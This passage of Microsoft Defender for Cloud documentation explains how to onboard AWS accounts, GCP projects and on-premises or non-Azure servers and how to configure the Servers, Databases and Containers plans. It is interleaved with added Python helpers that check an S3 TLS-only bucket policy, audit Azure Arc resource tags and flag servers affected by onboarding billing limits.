enabled, run the CloudFormation StackSet deployment again.
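To confirm that the bucket policy shown above (or whatever policy is already on the template bucket) actually closes the finding, the following Python helper is an added example, not part of the Microsoft or AWS documentation. It builds the TLS-only policy for a bucket ARN and checks a given policy document for a Deny statement that covers all S3 actions, every principal, and both the bucket and its objects, conditioned on aws:SecureTransport being false. The bucket ARN arn:aws:s3:::example-cfn-templates and the two weaker sample policies are constructed for illustration.

```python
"""Build and verify an S3 bucket policy that denies non-TLS requests.

Added example, not from the Microsoft or AWS documentation. The bucket ARN and
the sample policies are constructed for illustration.
"""
import json

BUCKET_ARN = "arn:aws:s3:::example-cfn-templates"  # constructed placeholder


def build_ssl_only_policy(bucket_arn):
    """Return the policy from the documentation with the bucket ARN filled in."""
    return {
        "Id": "ExamplePolicy",
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "AllowSSLRequestsOnly",
            "Action": "s3:*",
            "Effect": "Deny",
            "Principal": "*",
            "Resource": [bucket_arn, bucket_arn + "/*"],
            "Condition": {"Bool": {"aws:SecureTransport": "false"}},
        }],
    }


def _as_list(value):
    """IAM accepts either a string or a list for Action, Resource and Principal.AWS."""
    return value if isinstance(value, list) else [value]


def _covers_all_s3_actions(action):
    return any(a in ("*", "s3:*") for a in _as_list(action))


def _covers_every_principal(principal):
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def denies_insecure_transport(policy, bucket_arn):
    """True if a Deny statement blocks every non-TLS S3 call on the bucket and its objects."""
    required = {bucket_arn, bucket_arn + "/*"}
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Deny":
            continue
        # The condition value may be written as the string "false" or a JSON boolean.
        flag = stmt.get("Condition", {}).get("Bool", {}).get("aws:SecureTransport")
        if str(flag).lower() != "false":
            continue
        if not _covers_all_s3_actions(stmt.get("Action", [])):
            continue
        if not _covers_every_principal(stmt.get("Principal")):
            continue
        if required <= set(_as_list(stmt.get("Resource", []))):
            return True
    return False


# Constructed weaker variants that leave the finding open.
OBJECTS_ONLY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "AllowSSLRequestsOnly", "Effect": "Deny", "Principal": "*",
    # Only GetObject on objects is denied; ListBucket and other calls stay allowed over HTTP.
    "Action": "s3:GetObject", "Resource": BUCKET_ARN + "/*",
    "Condition": {"Bool": {"aws:SecureTransport": "false"}}}]}
WRONG_CONDITION = {"Version": "2012-10-17", "Statement": [{
    "Sid": "AllowSSLRequestsOnly", "Effect": "Deny", "Principal": "*",
    "Action": "s3:*", "Resource": [BUCKET_ARN, BUCKET_ARN + "/*"],
    # Denies TLS requests instead of plaintext ones.
    "Condition": {"Bool": {"aws:SecureTransport": "true"}}}]}


def policy_document(bucket_arn):
    """JSON text suitable for: aws s3api put-bucket-policy --bucket NAME --policy file://policy.json"""
    return json.dumps(build_ssl_only_policy(bucket_arn), indent=2)


if __name__ == "__main__":
    print(policy_document(BUCKET_ARN))
    print("compliant:", denies_insecure_transport(build_ssl_only_policy(BUCKET_ARN), BUCKET_ARN))
```

Save the output of policy_document() to a file and apply it with `aws s3api put-bucket-policy --bucket NAME --policy file://policy.json`; fetching the live policy back with `aws s3api get-bucket-policy` and passing it to denies_insecure_transport() gives you a repeatable check before waiting for the recommendation to refresh. The checker is deliberately strict: a statement that covers only objects, only some actions, or only some principals does not count.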


Monitor your AWS resources 


The security recommendations page in Defender for Cloud displays your AWS resources
alongside your Azure resources. Use the Environments filter to show only the AWS
resources.

To view all the active recommendations for your resources by resource type, use the
asset inventory page in Defender for Cloud and filter to the AWS resource type that
you're interested in.

Learn more


Check out the following blogs: 


• Ignite 2021: Microsoft Defender for Cloud news
• Security posture management and server protection for AWS and GCP


Clean up resources 


There's no need to clean up any resources for this article. 


Next steps 


Connecting your AWS account is part of the multicloud experience available in Microsoft 
Defender for Cloud: 


• Protect all of your resources with Defender for Cloud.
• Set up your on-premises machines and GCP projects.
• Get answers to common questions about onboarding your AWS account.
• Troubleshoot your multicloud connectors.


Connect your GCP project to Microsoft Defender for Cloud

Article • 07/24/2023


Workloads commonly span multiple cloud platforms. Cloud security services must do 
the same. Microsoft Defender for Cloud helps protect workloads in Google Cloud 
Platform (GCP), but you need to set up the connection between them and Defender for 
Cloud. 


If you're connecting a GCP project that you previously connected by using the classic 
connector, you must remove it first. Using a GCP project that's connected by both the 
classic and native connectors can produce duplicate recommendations. 


In the Defender for Cloud overview dashboard, connected GCP projects are displayed
alongside your Azure subscriptions (screenshot omitted).

Prerequisites 


To complete the procedures in this article, you need: 


• A Microsoft Azure subscription. If you don't have an Azure subscription, you can
  sign up for a free one.
• Microsoft Defender for Cloud set up on your Azure subscription.
• Access to a GCP project.
• Contributor permission on the relevant Azure subscription, and Owner permission
  on the GCP organization or project.

You can learn more about Defender for Cloud pricing on the pricing page.

When you're connecting GCP projects to specific Azure subscriptions, consider the
Google Cloud resource hierarchy and these guidelines:

• You can connect your GCP projects to Microsoft Defender for Cloud at the project
  level.
• You can connect multiple projects to one Azure subscription.
• You can connect multiple projects to multiple Azure subscriptions.


Connect your GCP project 

To connect your GCP project to Defender for Cloud by using a native connector:

1. Sign in to the Azure portal.

2. Go to Defender for Cloud > Environment settings.

3. Select Add environment > Google Cloud Platform.

[Screenshot: the Environment settings page, with the Add environment menu open and Google Cloud Platform selected.]

4. Enter all relevant information.

[Screenshot: the Project details tab of the Create GCP connector wizard. Fields: Connector name; Onboard (Single project or Organization); Subscription; Resource group; Location; GCP project number; GCP project Id.]

Optionally, if you select Organization, a management project and an organization
custom role are created on your GCP project for the onboarding process.


Autoprovisioning is enabled for the onboarding of new projects. 


5. Select Next: Select plans.

6. For the plans that you want to connect, turn the toggle to On. By default, all
necessary prerequisites and components are provisioned. Learn how to configure
each plan.

   If you choose to turn on the Microsoft Defender for Containers plan, ensure that
   you meet the network requirements for it.

7. Select Next: Configure access.

   a. Choose the deployment type:

      • Default access: Allows Defender for Cloud to scan your resources and
        automatically include future capabilities.
      • Least privilege access: Grants Defender for Cloud access to only the
        current permissions needed for the selected plans. If you select the least
        privileged permissions, you'll receive notifications on any new roles and
        permissions that are required to get full functionality for connector health.

   b. Choose the deployment method: GCP Cloud Shell or Terraform.

8. Select Copy.


[Screenshot: the Configure access tab of the Create GCP connector wizard, showing the "Copy script to GCP Cloud Shell" button for the generated Cloud Shell template and the "GCP Cloud Shell >" link.]


Note

For the discovery of GCP resources and for the authentication process, you
must enable the following APIs: iam.googleapis.com, sts.googleapis.com,
cloudresourcemanager.googleapis.com, iamcredentials.googleapis.com, and
compute.googleapis.com. If you don't enable these APIs, they're enabled
during the onboarding process when you run the gcloud script.


9. Select GCP Cloud Shell >. The GCP Cloud Shell opens.

10. Paste the script into the GCP Cloud Shell terminal and run it.

11. Ensure that the script created the following resources for Microsoft Defender Cloud
Security Posture Management (CSPM) and Defender for Containers:

   CSPM:
   • CSPM service account reader role
   • Microsoft Defender for Cloud identity federation
   • CSPM identity pool
   • Microsoft Defender for Servers service account (when the Servers plan is enabled)
   • Azure Arc for servers onboarding service account (when Azure Arc for servers
     autoprovisioning is enabled)

   Defender for Containers:
   • Microsoft Defender for Containers service account role
   • Microsoft Defender Data Collector service account role
   • Microsoft Defender for Cloud identity pool

After you create the connector, a scan starts on your GCP environment. New 
recommendations appear in Defender for Cloud after up to 6 hours. If you enabled 
autoprovisioning, Azure Arc and any enabled extensions are installed automatically for 
each newly detected resource. 


Optional: Configure selected plans 


By default, all plans are On. You can turn off plans that you don't need. 


Configure the Defender for Servers plan 


Microsoft Defender for Servers brings threat detection and advanced defenses to your 
GCP virtual machine (VM) instances. To have full visibility into Microsoft Defender for 
Servers security content, connect your GCP VM instances to Azure Arc. If you choose the 
Microsoft Defender for Servers plan, you need: 


• Microsoft Defender for Servers enabled on your subscription. Learn how to enable
  plans in Enable enhanced security features.
• Azure Arc for servers installed on your VM instances.

We recommend that you use the autoprovisioning process to install Azure Arc on your
VM instances. Autoprovisioning is enabled by default in the onboarding process and
requires Owner permissions on the subscription. The Azure Arc autoprovisioning
process uses the OS Config agent on the GCP end. Learn more about the availability of
the OS Config agent on GCP machines.

The Azure Arc autoprovisioning process uses the VM manager on GCP to enforce
policies on your VMs through the OS Config agent. A VM that has an active OS Config
agent incurs a cost according to GCP. To see how this cost might affect your account,
refer to the GCP technical documentation.

Microsoft Defender for Servers doesn't install the OS Config agent on a VM that doesn't
have it installed. However, Microsoft Defender for Servers enables communication
between the OS Config agent and the OS Config service if the agent is already installed
but not communicating with the service. This communication can change the OS Config
agent from inactive to active and lead to more costs.


Alternatively, you can manually connect your VM instances to Azure Arc for servers. 
Instances in projects with the Defender for Servers plan enabled that aren't connected 
to Azure Arc are surfaced by the recommendation GCP VM instances should be 
connected to Azure Arc. Select the Fix option in the recommendation to install Azure 
Arc on the selected machines. 


The respective Azure Arc servers for EC2 instances or GCP virtual machines that no 
longer exist (and the respective Azure Arc servers with a status of Disconnected or 
Expired) are removed after seven days. This process removes irrelevant Azure Arc 
entities to ensure that only Azure Arc servers related to existing instances are displayed. 


Ensure that you fulfill the network requirements for Azure Arc. 
Enable these other extensions on the Azure Arc-connected machines: 


e Microsoft Defender for Endpoint 

e A vulnerability assessment solution (Microsoft Defender Vulnerability Management 
or Qualys) 

e The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor 
agent 


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All the multicloud accounts and projects (from both AWS and GCP) 
under the same subscription inherit the subscription settings for the Log Analytics agent 
and the Azure Monitor agent. Learn more about monitoring components for Defender 


for Servers. 


Defender for Servers assigns tags to your GCP resources to manage the
autoprovisioning process. You must have these tags properly assigned to your resources
so that Defender for Servers can manage your resources: Cloud, InstanceName,
MDFCSecurityConnector, MachineId, ProjectId, and ProjectNumber.
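The following is an added example, not code from the Microsoft documentation: it audits an export of the Azure Arc server records created for your GCP instances, reporting machines that lack any of the six required tags and separating out Disconnected or Expired records that are already past the seven-day cleanup window described above. The record shape (name, status, last_status_change, tags), the sample values and the fixed reference time are constructed assumptions.

```python
"""Audit the Azure Arc server records that Defender for Servers manages for GCP.

Added example, not Microsoft's code. The record shape used here (name, status,
last_status_change, tags) is constructed for illustration; feed it from your
own export of Azure Arc-enabled server resources.
"""
from datetime import datetime, timedelta, timezone

# Tags the documentation requires on each resource for autoprovisioning.
REQUIRED_TAGS = frozenset({
    "Cloud", "InstanceName", "MDFCSecurityConnector",
    "MachineId", "ProjectId", "ProjectNumber",
})

# Arc servers whose instance no longer exists, or that sit in Disconnected or
# Expired state, are removed by Defender for Cloud after seven days.
CLEANUP_AFTER = timedelta(days=7)
STALE_STATUSES = frozenset({"Disconnected", "Expired"})

# Fixed reference time so the sample run is reproducible (constructed).
FIXED_NOW = datetime(2023, 7, 24, tzinfo=timezone.utc)


def missing_tags(tags):
    """Return the required tags that are absent or empty, sorted by name."""
    tags = tags or {}
    return sorted(tag for tag in REQUIRED_TAGS if not tags.get(tag))


def pending_cleanup(record, now):
    """True when the record is Disconnected/Expired and past the seven-day
    window, i.e. it is about to be removed and is not worth re-tagging."""
    if record.get("status") not in STALE_STATUSES:
        return False
    changed = datetime.fromisoformat(record["last_status_change"])
    return now - changed >= CLEANUP_AFTER


def audit(records, now=None):
    """Classify each record as ok, missing_tags or pending_cleanup.

    Returns {name: (verdict, details)} where details is the list of missing
    tags, or the stale status for pending_cleanup.
    """
    now = now or datetime.now(timezone.utc)
    results = {}
    for rec in records:
        if pending_cleanup(rec, now):
            results[rec["name"]] = ("pending_cleanup", rec["status"])
            continue
        missing = missing_tags(rec.get("tags"))
        results[rec["name"]] = ("missing_tags", missing) if missing else ("ok", [])
    return results


# Constructed sample records; every value is a placeholder.
SAMPLE_RECORDS = [
    {"name": "gcp-vm-01", "status": "Connected",
     "last_status_change": "2023-07-20T10:00:00+00:00",
     "tags": {"Cloud": "GCP", "InstanceName": "gcp-vm-01",
              "MDFCSecurityConnector": "connector-placeholder",
              "MachineId": "1111", "ProjectId": "project-placeholder",
              "ProjectNumber": "123456"}},
    {"name": "gcp-vm-02", "status": "Connected",
     "last_status_change": "2023-07-21T10:00:00+00:00",
     # ProjectNumber absent and MachineId empty: Defender cannot manage it.
     "tags": {"Cloud": "GCP", "InstanceName": "gcp-vm-02",
              "MDFCSecurityConnector": "connector-placeholder",
              "MachineId": "", "ProjectId": "project-placeholder"}},
    {"name": "gcp-vm-03", "status": "Disconnected",
     "last_status_change": "2023-07-01T10:00:00+00:00", "tags": {}},
]

if __name__ == "__main__":
    for name, (verdict, details) in audit(SAMPLE_RECORDS, FIXED_NOW).items():
        print(f"{name}: {verdict} {details}")
```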


To configure the Defender for Servers plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure.

   [Screenshot: the Servers plan card showing "Auto-provisioning enabled" with a
   Configure link.]

3. On the Auto-provisioning configuration pane, turn the toggles to On or Off,
   depending on your need.

   [Screenshot: the Auto-provisioning configuration pane. Its toggles and notes:

   Azure Arc agent (On): Connects your servers to Azure. Enable to install Azure Arc
   on new and existing machines with the OS Config agent.
   Note: When Arc auto-provisioning is enabled, it connects existing OS Config agents
   on GCP's side that are not communicating with the OS Config service. This may
   lead to additional charges. For more information, see the GCP documentation.

   Additional extensions for Arc-connected machines (preview): the selected
   extensions are automatically provisioned on machines connected to Azure Arc.
   - Microsoft Defender for Endpoint extension (On): provides comprehensive endpoint
     detection and response (EDR) capabilities.
   - Vulnerability assessment (On): enables vulnerability discovery and management
     tools for your machines. Solution options: Microsoft threat and vulnerability
     management (selected) or the Microsoft Defender for Cloud integrated Qualys
     scanner. If you've already configured auto-provisioning for a BYOL solution,
     you'll need to disable it before you can configure this agent.]

   If the Azure Arc agent toggle is Off, you need to follow the manual installation
   process mentioned earlier.


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Configure the Defender for Databases plan 


To have full visibility into Microsoft Defender for Databases security content, connect 
your GCP VM instances to Azure Arc. 


To configure the Defender for Databases plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure.

   [Screenshot: the Databases plan card showing "Auto-provisioning enabled" with a
   Configure link.]

3. On the Auto-provisioning configuration pane, turn the toggles to On or Off,
   depending on your need.

   [Screenshot: the Auto-provisioning configuration pane. Its toggles and notes:

   Azure Arc agent (On): Connects your servers to Azure. Enable to install Azure Arc
   on new and existing machines with the OS Config agent.
   Note: When Arc auto-provisioning is enabled, it connects existing OS Config agents
   on GCP's side that are not communicating with the OS Config service. This may
   lead to additional charges. For more information, see the GCP documentation.

   Additional agents for Arc-connected machines: settings for the Log Analytics agent
   and the discovery and registration service for SQL on Arc agents are managed at
   the subscription level. For advanced configuration, edit the subscription settings.
   - SQL servers on machines (On): applies to SQL on Azure virtual machines, SQL
     servers on-premises, and Azure Arc-enabled SQL servers.
   - Log Analytics extension (On): collects security-related configurations and event
     logs from the machine and stores the data in your Log Analytics workspace for
     analysis. Any other solutions enabled on the selected workspace are applied to
     machines connected to it; for paid solutions, this could result in additional
     charges.
   - Automatic SQL server discovery and registration (Off): discovers and registers
     both existing and future SQL Server 2012+ instances running on your virtual
     machines, for better manageability of security posture and a more comprehensive
     data asset inventory. The machines are registered as SQL Arc-enabled servers;
     neither SQL Server nor the host requires a restart.]

   If the toggle for Azure Arc is Off, you need to follow the manual installation
   process mentioned earlier.


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Configure the Defender for Containers plan 


Microsoft Defender for Containers brings threat detection and advanced defenses to 
your GCP Google Kubernetes Engine (GKE) Standard clusters. To get the full security 
value out of Defender for Containers and to fully protect GCP clusters, ensure that you 
meet the following requirements. 


Note

• If you choose to disable the available configuration options, no agents or
  components will be deployed to your clusters. Learn more about feature
  availability.

• Defender for Containers, when deployed on GCP, may incur external costs such as
  logging costs, pub/sub costs, and egress costs.

• Kubernetes audit logs to Defender for Cloud: Enabled by default. This
  configuration is available at the GCP project level only. It provides agentless
  collection of the audit log data through GCP Cloud Logging to the Microsoft
  Defender for Cloud back end for further analysis.

• Azure Arc-enabled Kubernetes, the Defender extension, and the Azure Policy
  extension: Enabled by default. You can install Azure Arc-enabled Kubernetes and
  its extensions on your GKE clusters in three ways:

  o Enable Defender for Containers autoprovisioning at the project level, as
    explained in the instructions in this section. We recommend this method.

  o Use Defender for Cloud recommendations for per-cluster installation. They
    appear on the Microsoft Defender for Cloud recommendations page. Learn how
    to deploy the solution to specific clusters.

  o Manually install Arc-enabled Kubernetes and extensions.


To configure the Defender for Containers plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure.

   [Screenshot: the Containers plan card showing "Fully configured: 3 / 3" with a
   Configure link.]

3. On the Defender for Containers configuration pane, turn the toggles to On.

   [Screenshot: the Defender for Containers configuration pane with three toggles:

   - Kubernetes audit logs to Defender for Cloud (On): sends control plane audit logs
     from the GKE control plane to your project's Cloud Logging and creates Pub/Sub
     resources. This incurs additional charges on your GCP project.
   - Auto provision Defender's extension for Azure Arc (On): the Defender extension
     is a DaemonSet that sends security-related data to Defender for Cloud to
     provide threat protection for GKE clusters. Azure Arc connects your GKE cluster
     to Azure. This is an extension to Azure Arc-enabled Kubernetes; for GKE clusters
     not already connected to Arc, it installs an Arc-enabled Kubernetes agent.
   - Auto provision Azure Policy extension for Azure Arc (On): extends Gatekeeper v3
     to apply at-scale enforcements and safeguards on your clusters in a centralized,
     consistent manner. This is also an extension to Azure Arc-enabled Kubernetes;
     for GKE clusters not already connected to Arc, it installs an Arc-enabled
     Kubernetes agent.

   Save and Cancel buttons.]


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Monitor your GCP resources 


The security recommendations page in Defender for Cloud displays your GCP resources 
together with your Azure and AWS resources for a true multicloud view. 


To view all the active recommendations for your resources by resource type, use the 
asset inventory page in Defender for Cloud and filter to the GCP resource type that 
you're interested in. 


Next steps 


Connecting your GCP project is part of the multicloud experience available in Microsoft 
Defender for Cloud: 


• Protect all of your resources with Defender for Cloud.
• Set up your on-premises machines and AWS account.
• Troubleshoot your multicloud connectors.
• Get answers to common questions about connecting your GCP project.


Connect your non-Azure machines to Microsoft Defender for Cloud with Defender
for Endpoint

Defender for Cloud allows you to directly onboard your non-Azure servers by deploying
the Defender for Endpoint agent. This provides protection for both your cloud and
non-cloud assets under a single, unified offering.


Note

To connect your non-Azure machines via Azure Arc, see Connect your non-Azure
machines to Microsoft Defender for Cloud with Azure Arc.


This tenant-level setting allows you to automatically and natively onboard any non-
Azure server running Defender for Endpoint to Defender for Cloud, without any extra
agent deployments. This onboarding path is ideal for customers with a mixed and hybrid
server estate who wish to consolidate server protection under Defender for Servers.


Availability 


Release state: GA

Supported operating systems: All Windows and Linux Server operating systems
supported by Defender for Endpoint

Required roles and permissions: To manage this setting, you need Subscription Owner
(on the chosen subscription), and Microsoft Entra Global Administrator or Microsoft
Entra Security Administrator

Environments: On-premises servers; multicloud VMs with limited support (see the
limitations section)

Supported plans: Defender for Servers P1; Defender for Servers P2 with limited
features (see the limitations section)


How it works 


Direct onboarding is a seamless integration between Defender for Endpoint and
Defender for Cloud that doesn't require extra software deployment on your servers.
Once enabled, it also shows your non-Azure server devices onboarded to Defender for
Endpoint in Defender for Cloud, under a designated Azure Subscription you configure
(in addition to their regular representation in the Microsoft 365 Defender portal). The
Azure Subscription is used for licensing, billing, alerts, and security insights but doesn't
provide server management capabilities such as Azure Policy, Extensions, or Guest
configuration. To enable server management capabilities, refer to the deployment of
Azure Arc.


Enabling direct onboarding 


Enabling direct onboarding is an opt-in setting at the tenant level. It affects both 
existing and new servers onboarded to Defender for Endpoint in the same Microsoft 
Entra tenant. Shortly after enabling this setting, your server devices will show under the 
designated subscription. Alerts, software inventory, and vulnerability data are integrated 
with Defender for Cloud, in a similar way to how it works with Azure VMs. 


Before you begin: 


• Make sure you have the required permissions
• If you have a Microsoft Defender for Endpoint for Servers license on your tenant,
  make sure to indicate it in Defender for Cloud
• Review the limitations section


Enabling in the Defender for Cloud portal 


1. Go to Defender for Cloud > Environment Settings > Direct onboarding. 

2. Switch the Direct onboarding toggle to On. 

3. Select the subscription you would like to use for servers onboarded directly with 
Defender for Endpoint 

4. Select Save. 


[Screenshot: the Direct onboarding with Defender for Endpoint page under Environment
settings. It explains that after enabling this setting, non-Azure servers onboarded to
Defender for Endpoint on this tenant are reflected and billed under a designated Azure
subscription, notes that if Defender for Servers is off for that subscription, Defender
for Servers P1 will be enabled for it, and shows the Direct onboarding toggle set to On
with a Designated subscription selected.]


You've now successfully enabled direct onboarding on your tenant. After you enable it 
for the first time, it may take up to 24 hours to see your non-Azure servers in your 
designated subscription. 


Deploying Defender for Endpoint on your servers 


Deploying the Defender for Endpoint agent on your on-premises Windows and Linux 
servers is the same whether you use direct onboarding or not. Refer to the Defender for 
Endpoint onboarding guide for further instructions. 


Current limitations 


• Plan support: Direct onboarding provides access to all Defender for Servers Plan 1
  features. However, certain features in Plan 2 still require the deployment of the
  Azure Monitor Agent, which is only available with Azure Arc on non-Azure
  machines. If you enable Plan 2 on your designated subscription, machines
  onboarded directly with Defender for Endpoint have access to all Defender for
  Servers Plan 1 features and the Defender Vulnerability Management Addon
  features included in Plan 2.

• Multi-cloud support: You can directly onboard VMs in AWS and GCP using the
  Defender for Endpoint agent. However, if you plan to simultaneously connect your
  AWS or GCP account to Defender for Servers using multicloud connectors, it's
  currently still recommended to deploy Azure Arc.

• Simultaneous onboarding limited support: Defender for Cloud makes a best
  effort to correlate servers onboarded using multiple billing methods. However, in
  certain server deployment use cases, there may be limitations where Defender for
  Cloud is unable to correlate your machines. This may result in overcharges on
  certain devices if direct onboarding is also enabled on your tenant.

  The following are deployment use cases currently with this limitation when used
  with direct onboarding of your tenant:

  Location: All
  Deployment use case: Windows 2012, 2016: Azure VMs or Azure Arc machines already
  onboarded and billed by Defender for Servers via an Azure subscription or Log
  Analytics workspace, running the Defender for Endpoint modern unified agent
  without the MDE.Windows Azure extension. For such machines, you can enable
  Defender for Cloud integration with Defender for Endpoint to deploy the extension.

  Location: On-premises (not running Azure Arc)
  Deployment use case: Windows Server 2012, 2016: Servers running the Defender for
  Endpoint modern unified agent, and already billed by Defender for Servers P2 via
  the Log Analytics workspace.

  Location: AWS, GCP (not running Azure Arc)
  Deployment use case: Windows Server 2012, 2016: AWS or GCP VMs using the modern
  unified Defender for Endpoint solution, already onboarded and billed by Defender
  for Servers via multicloud connectors, Log Analytics workspace, or both.

  Note: For Windows 2019 and above and Linux, agent version updates have already
  been released to support simultaneous onboarding without limitations. For
  Windows, use agent version 10.8555.X and above; for Linux, use agent version
  30.101.23052.009 and above.
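As an added example (not code from the Microsoft documentation), the function below encodes the correlation-limitation table and the minimum agent versions just listed, so you can flag machines at risk of being billed twice before enabling direct onboarding on a tenant. The Server record fields, the sample inventory and its names and versions are constructed assumptions; map your own inventory export onto them.

```python
"""Flag servers that the direct-onboarding correlation limitation applies to.

Added example, not Microsoft's code. It encodes the limitations table and the
minimum agent versions from the documentation. The Server fields and the
sample inventory below are constructed assumptions.
"""
from dataclasses import dataclass
from typing import FrozenSet, Optional

# Documented minimums for simultaneous onboarding without limitations.
# "10.8555.X" means any build of 10.8555, so only two components are compared.
WINDOWS_MIN = (10, 8555)
LINUX_MIN = (30, 101, 23052, 9)
LEGACY_WINDOWS = {"2012", "2012 R2", "2016"}   # releases named in the table


def parse_version(text: str) -> tuple:
    """'30.101.23052.009' -> (30, 101, 23052, 9)."""
    return tuple(int(part) for part in text.strip().split("."))


def meets_minimum(os_family: str, agent_version: str) -> bool:
    """Compare only as many components as the documented minimum has."""
    minimum = WINDOWS_MIN if os_family == "windows" else LINUX_MIN
    return parse_version(agent_version)[:len(minimum)] >= minimum


@dataclass(frozen=True)
class Server:
    name: str
    os_family: str          # "windows" or "linux"
    os_release: str         # "2012 R2", "2016", "2019", "ubuntu-22.04", ...
    location: str           # "azure", "onprem", "aws" or "gcp"
    agent_version: str      # Defender for Endpoint agent version
    arc_connected: bool = False
    unified_agent: bool = False          # modern unified Defender for Endpoint agent
    mde_windows_extension: bool = False  # MDE.Windows Azure extension installed
    billed_via: FrozenSet[str] = frozenset()  # "subscription", "workspace", "multicloud"


def correlation_limitation(s: Server) -> Optional[str]:
    """Return the documented limitation that applies to this server when direct
    onboarding is enabled on the tenant, or None if it can be correlated."""
    legacy = s.os_family == "windows" and s.os_release in LEGACY_WINDOWS
    if not legacy:
        # Windows 2019+ and Linux: fixed by agent updates, given a new enough agent.
        if meets_minimum(s.os_family, s.agent_version):
            return None
        return "agent version below the documented minimum for simultaneous onboarding"
    if not s.unified_agent:
        return None  # every table row concerns the modern unified agent
    # Row 1 (location: all): Azure VM or Arc machine billed via subscription or
    # workspace, without the MDE.Windows extension.
    if (s.location == "azure" or s.arc_connected) \
            and s.billed_via & {"subscription", "workspace"} \
            and not s.mde_windows_extension:
        return ("billed via subscription/workspace without the MDE.Windows extension; "
                "enable the Defender for Cloud integration with Defender for Endpoint "
                "to deploy the extension")
    # Row 2: on-premises, not Arc, already billed (P2) via the Log Analytics workspace.
    if s.location == "onprem" and not s.arc_connected and "workspace" in s.billed_via:
        return "on-premises server already billed by Defender for Servers P2 via workspace"
    # Row 3: AWS/GCP, not Arc, billed via multicloud connector, workspace or both.
    if s.location in {"aws", "gcp"} and not s.arc_connected \
            and s.billed_via & {"multicloud", "workspace"}:
        return "AWS/GCP VM already billed via multicloud connector and/or workspace"
    return None


def report(servers) -> dict:
    """Map each server name to the limitation that applies (None when clean)."""
    return {s.name: correlation_limitation(s) for s in servers}


# Constructed sample inventory; names and versions are placeholders.
SAMPLE_SERVERS = [
    Server("dc01", "windows", "2016", "azure", "10.8560.1", unified_agent=True,
           billed_via=frozenset({"subscription"})),
    Server("dc02", "windows", "2016", "azure", "10.8560.1", unified_agent=True,
           mde_windows_extension=True, billed_via=frozenset({"subscription"})),
    Server("fs03", "windows", "2012 R2", "onprem", "10.8560.1", unified_agent=True,
           billed_via=frozenset({"workspace"})),
    Server("app04", "windows", "2016", "aws", "10.8560.1", unified_agent=True,
           billed_via=frozenset({"multicloud"})),
    Server("web05", "windows", "2019", "onprem", "10.8555.12345"),
    Server("web06", "windows", "2019", "onprem", "10.8540.2"),
    Server("db07", "linux", "ubuntu-22.04", "gcp", "30.101.23052.009"),
    Server("db08", "linux", "ubuntu-22.04", "gcp", "30.101.23042.001"),
]

if __name__ == "__main__":
    for name, limitation in report(SAMPLE_SERVERS).items():
        print(f"{name}: {limitation or 'no correlation limitation'}")
```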


Next steps 


This page showed you how to add your non-Azure machines to Microsoft Defender for
Cloud. To monitor their status, use the inventory tools as explained in the following
page:

• Explore and manage your resources with asset inventory


Connect your non-Azure machines to Microsoft Defender for Cloud

Microsoft Defender for Cloud can monitor the security posture of your non-Azure
machines, but first you need to connect them to Azure.


You can connect your non-Azure computers in any of the following ways: 


• Onboarding with Azure Arc:
  o By using Azure Arc-enabled servers (recommended)
  o By using the Azure portal
• Onboarding directly with Microsoft Defender for Endpoint


This article describes the methods for onboarding with Azure Arc. 


If you're connecting machines from other cloud providers, see Connect your AWS 
account or Connect your GCP project. The multicloud connectors for Amazon Web 
Services (AWS) and Google Cloud Platform (GCP) in Defender for Cloud transparently 
handle the Azure Arc deployment for you. 


Prerequisites

To complete the procedures in this article, you need:

• A Microsoft Azure subscription. If you don't have an Azure subscription, you can
  sign up for a free one.
• Microsoft Defender for Cloud set up on your Azure subscription.
• Access to an on-premises machine.


Connect on-premises machines by using Azure Arc

A machine that has Azure Arc-enabled servers becomes an Azure resource. When you
install the Log Analytics agent on it, it appears in Defender for Cloud with
recommendations, like your other Azure resources.

Azure Arc-enabled servers provide enhanced capabilities, such as enabling guest
configuration policies on the machine and simplifying deployment with other Azure
services. For an overview of the benefits of Azure Arc-enabled servers, see Supported
cloud operations.


To deploy Azure Arc on one machine, follow the instructions in Quickstart: Connect 
hybrid machines with Azure Arc-enabled servers. 


To deploy Azure Arc on multiple machines at scale, follow the instructions in Connect 
hybrid machines to Azure at scale. 


Defender for Cloud tools for automatically deploying the Log Analytics agent work with 
machines running Azure Arc. However, this capability is currently in preview. When you 
connect your machines by using Azure Arc, use the relevant Defender for Cloud 
recommendation to deploy the agent and benefit from the full range of protections that 
Defender for Cloud offers: 


• Log Analytics agent should be installed on your Linux-based Azure Arc machines
• Log Analytics agent should be installed on your Windows-based Azure Arc
  machines


Connect on-premises machines by using the Azure portal


After you connect Defender for Cloud to your Azure subscription, you can start 
connecting your on-premises machines from the Getting started page in Defender for 
Cloud. 


1. Sign in to the Azure portal.

2. Search for and select Microsoft Defender for Cloud.

3. On the Defender for Cloud menu, select Getting started.

4. Select the Get started tab.

5. Find Add non-Azure servers and select Configure.

   A list of your Log Analytics workspaces appears.


6. (Optional) If you don't already have a Log Analytics workspace in which to store 
the data, select Create new workspace and follow the on-screen guidance. 


7. From the list of workspaces, select Upgrade for the relevant workspace to turn on 
Defender for Cloud paid plans for 30 free days. 


8. From the list of workspaces, select Add Servers for the relevant workspace. 


9. On the Agents management page, choose one of the following procedures, 
depending on the type of machines you're onboarding: 


• Onboard your Windows server
• Onboard your Linux server


Onboard your Windows server 


When you add a Windows server, you need to get the information on the Agents 
management page and download the appropriate agent file (32 bit or 64 bit). 


To onboard a Windows server: 


1. Select Windows servers.

   [Screenshot: the Agents management page for a workspace. It shows how many
   Windows computers are connected via the Azure Monitor Windows agent and via the
   Log Analytics Windows agent (legacy), a link to Data Collection Rules for setting up
   the new Azure Monitor agent, and the Log Analytics agent instructions: Download
   Windows Agent (64 bit) and (32 bit) links, the Workspace ID, the Primary key and
   Secondary key with Regenerate buttons, and a Log Analytics Gateway download to act
